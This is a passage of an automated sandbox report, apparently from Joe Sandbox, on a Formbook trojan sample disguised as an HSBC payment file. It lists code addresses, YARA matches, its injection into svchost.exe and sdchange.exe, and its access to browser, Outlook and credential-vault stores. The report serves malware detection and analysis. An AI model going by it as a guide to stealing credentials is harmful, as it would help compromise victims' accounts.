            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DEDAC65_2_04DEDAC6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DDDAAC5_2_04DDDAAC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D85AA05_2_04D85AA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE1AA35_2_04DE1AA3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFFA495_2_04DFFA49
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF7A465_2_04DF7A46
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DB3A6C5_2_04DB3A6C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DB5BF05_2_04DB5BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D7DBF95_2_04D7DBF9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D5FB805_2_04D5FB80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFFB765_2_04DFFB76
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E118005_2_02E11800
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E0C7475_2_02E0C747
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E0C7505_2_02E0C750
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E0A9F05_2_02E0A9F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E0A9945_2_02E0A994
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E0C9705_2_02E0C970
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E14EB05_2_02E14EB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E130905_2_02E13090
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E130495_2_02E13049
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E2B4205_2_02E2B420
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04BEE78D5_2_04BEE78D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04BED7F85_2_04BED7F8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04BEE2D65_2_04BEE2D6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04BEE3F35_2_04BEE3F3
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: String function: 00748900 appears 42 times
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: String function: 00727DE1 appears 36 times
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: String function: 00740AE3 appears 70 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04DAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04D2B970 appears 280 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04DBF290 appears 105 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04D87E54 appears 111 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04D75130 appears 58 times
            Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111499505.0000000003DED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rHSBCBank_Paymentswiftcpy.exe
            Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2109682729.0000000003BF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rHSBCBank_Paymentswiftcpy.exe
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/8
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078A06A GetLastError,FormatMessageW,0_2_0078A06A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007781CB AdjustTokenPrivileges,CloseHandle,0_2_007781CB
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007787E1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0078B333
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0079EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0079EE0D
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007983BB
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00724E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00724E89
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeFile created: C:\Users\user\AppData\Local\Temp\aut25C.tmpJump to behavior
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003063000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3954559304.0000000003092000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2567888867.0000000003063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rHSBCBank_Paymentswiftcpy.exeReversingLabs: Detection: 34%
            Source: rHSBCBank_Paymentswiftcpy.exeVirustotal: Detection: 41%
            Source: unknownProcess created: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"Jump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: rHSBCBank_Paymentswiftcpy.exeStatic file information: File size 1179648 > 1048576
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EqOUZfSIzU.exe, 00000004.00000000.2301808549.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3954823867.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00724B37 LoadLibraryA,GetProcAddress,0_2_00724B37
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0072C4C7 push A30072BAh; retn 0072h0_2_0072C50D
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00748945 push ecx; ret 0_2_00748958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041402F push ss; ret 2_2_00414032
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415921 push ebp; retf 2_2_00415929
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041629C pushad ; retf 2_2_0041629D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403370 push eax; ret 2_2_00403372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411329 pushad ; ret 2_2_0041132F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BC0 push esp; iretd 2_2_00401CFB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004083D4 push ebx; retf 2_2_004083D5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BBE9 push ebp; retf 2_2_0040BBEC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BB6 push esp; iretd 2_2_00401CFB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411556 push cs; iretd 2_2_00411557
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A519 push esp; retf 2_2_0041A51B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ADDA pushad ; retf 2_2_0040AE05
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411584 pushad ; retf 2_2_00411587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266CA74 pushad ; retf 4_2_0266CA77
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266CA46 push cs; iretd 4_2_0266CA47
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_02675A09 push esp; retf 4_2_02675A0B
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026662CA pushad ; retf 4_2_026662F5
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266C819 pushad ; ret 4_2_0266C81F
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026638C4 push ebx; retf 4_2_026638C5
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026670D9 push ebp; retf 4_2_026670DC
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0267A1DF push esi; iretd 4_2_0267A21E
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_02670E11 push ebp; retf 4_2_02670E19
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0267D772 push es; retn 0000h4_2_0267D77A
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0267178C pushad ; retf 4_2_0267178D
